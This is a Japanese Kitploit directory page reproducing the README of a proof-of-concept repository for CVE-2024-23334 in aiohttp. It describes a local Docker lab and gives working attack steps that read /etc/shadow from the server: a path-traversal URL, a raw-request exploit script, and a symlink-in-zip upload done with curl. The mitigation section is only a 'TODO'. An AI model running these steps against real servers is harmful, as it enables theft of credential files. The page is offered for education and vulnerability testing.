Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
poc-cve-2024-23334 — このリポジトリには、報告された脆弱性CVE-2024-23334に対するaiohttpライブラリの悪用に関する概念実証(PoC)が含まれています。 | Kitploit
ツール/GitHubGitHub/brian-edgar-re/poc-cve-2024-23334
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubbrian-edgar-re/poc-cve-2024-23334

poc-cve-2024-23334

このリポジトリには、報告された脆弱性CVE-2024-23334に対するaiohttpライブラリの悪用に関する概念実証(PoC)が含まれています。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

poc-cve-2024-23334

このリポジトリには、報告された脆弱性CVE-2024-23334に対するaiohttpライブラリの悪用に関する概念実証(Proof of Concept)が含まれています。

これは2つの理由で作成されました:

  1. 教育目的:アプリケーションセキュリティを始めたばかりの方にとって、脆弱性を再現する手順を確認し、その背後にある概念を理解するのに役立ちます。
  2. 修正手順:問題を修正するための緩和策を共有します。

詳細については、私のウェブサイト(https://brianre.dev/)をご覧ください。

要件

  • Dockerをインストールする
  • Python3をインストールする

プロジェクトをローカルで実行する方法

  1. このリポジトリをローカルにクローンします。
  2. イメージをビルドするには、次のコマンドを実行します:
root@kitploit:~
make build
  1. コンテナを実行するには、次のコマンドを実行します:
root@kitploit:~
make run

Dockerをデタッチモードで実行したい場合は、次のコマンドを実行するだけです:

root@kitploit:~
make rund

シナリオ

  1. パストラバーサルを実行し、ローカルファイルインクルージョン(LFI)脆弱性を悪用するようにURLを変更したリクエストを行う: エクスプロイトを実行するには、次のスクリプトを実行します:
root@kitploit:~
python3 exploits/exploit_path_traversal.py

このスクリプトを実行すると、サーバーに対してRAW HTTPリクエストを実行しています。curlを使用したり、ブラウザで直接アクセスしたりせずにこの方法を採用するのは、 これらのツールはHTTPリクエストを送信する前にURLのサニタイズと正規化を行うためです。これにはパス正規化が含まれます: curlやブラウザなどのツールはURLパスを処理し、ディレクトリトラバーサルに使用される .. のようなシーケンスを削除します。 そのため、/static/../../../../../../../../../../../../etc/shadow のようなパスは /etc/shadow に正規化され、 そして、そのようなパスは標準的なWebサーバーのリソースとして通常存在しないため、404エラーになります。

  1. /etc/shadow などの制限されたファイルへのシンボリックリンクがすでに作成されている。 このシナリオは最も可能性が低いですが、 社内の誰かがこれを利用して情報を漏えいする可能性があり、人々は静的ログを確認しないかもしれません。 また、静的ファイルへのアクセスがログに記録されない場合、いつ漏えいしたかを特定するのは非常に困難です。

このリポジトリで作成されたシナリオは、脆弱性を説明し、それが存在し、まだ悪用可能であることを証明するためのものです。

  1. 誰かがシンボリックリンクをサーバーにアップロードして悪用できる。 これはより現実的なシナリオで、私が行うのは自分のコンピュータで生成したシンボリックリンクをアップロードし、 そのファイルにアクセスして /etc/shadow などのファイルを取得することです。

これを実行する方法は、圧縮ファイルを使用することです。そうすることで、シンボリックリンクをアップロードし、サーバー上で解凍されると、 同じシンボリックリンクが生成されます。curlを使用してシンボリックリンクを link.jpeg ファイルとして直接アップロードすると、シンボリックリンクが指すローカルファイルのみが読み取られ、 代わりに元のファイルがアップロードされます。したがって、サーバーのファイルシステムの特定のパスを対象としたい場合は、.zip や .tar.gz などの圧縮ファイルをアップロードできるようにする必要があります。

この2番目のシナリオを再現するには、次の手順に従う必要があります:

root@kitploit:~
touch /etc/shadow   # It creates a file on your machine on the specified directory. Be sure that you don't replace an existing file.
ln -s /etc/shadow exploit.jpeg  # Creates a symlink with the /etc/shadow file and name it exploit.jpeg
zip -y images.zip exploit.jpeg  # Zip the symlink
curl -X POST -F "[email protected]" http://localhost:8080/upload # Upload the zip file
curl -o shadow.txt http://localhost:8080/static/exploit.jpeg    # Access the symlink and, because aiohttp has the vulnerability, it returns the /etc/shadow from the server.

緩和策

TODO

開発

ローカルで開発するためにプロジェクトをセットアップするには、次のことを行う必要があります:

  1. 仮想環境を作成します。
root@kitploit:~
python3 -m venv env
  1. 依存関係をインストールします。
root@kitploit:~
pip3 install -r requirements.txt
pip3 install -r test-requirements.txt

リソース

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23334
  • https://nvd.nist.gov/vuln/detail/CVE-2024-23334
ツールをダウンロード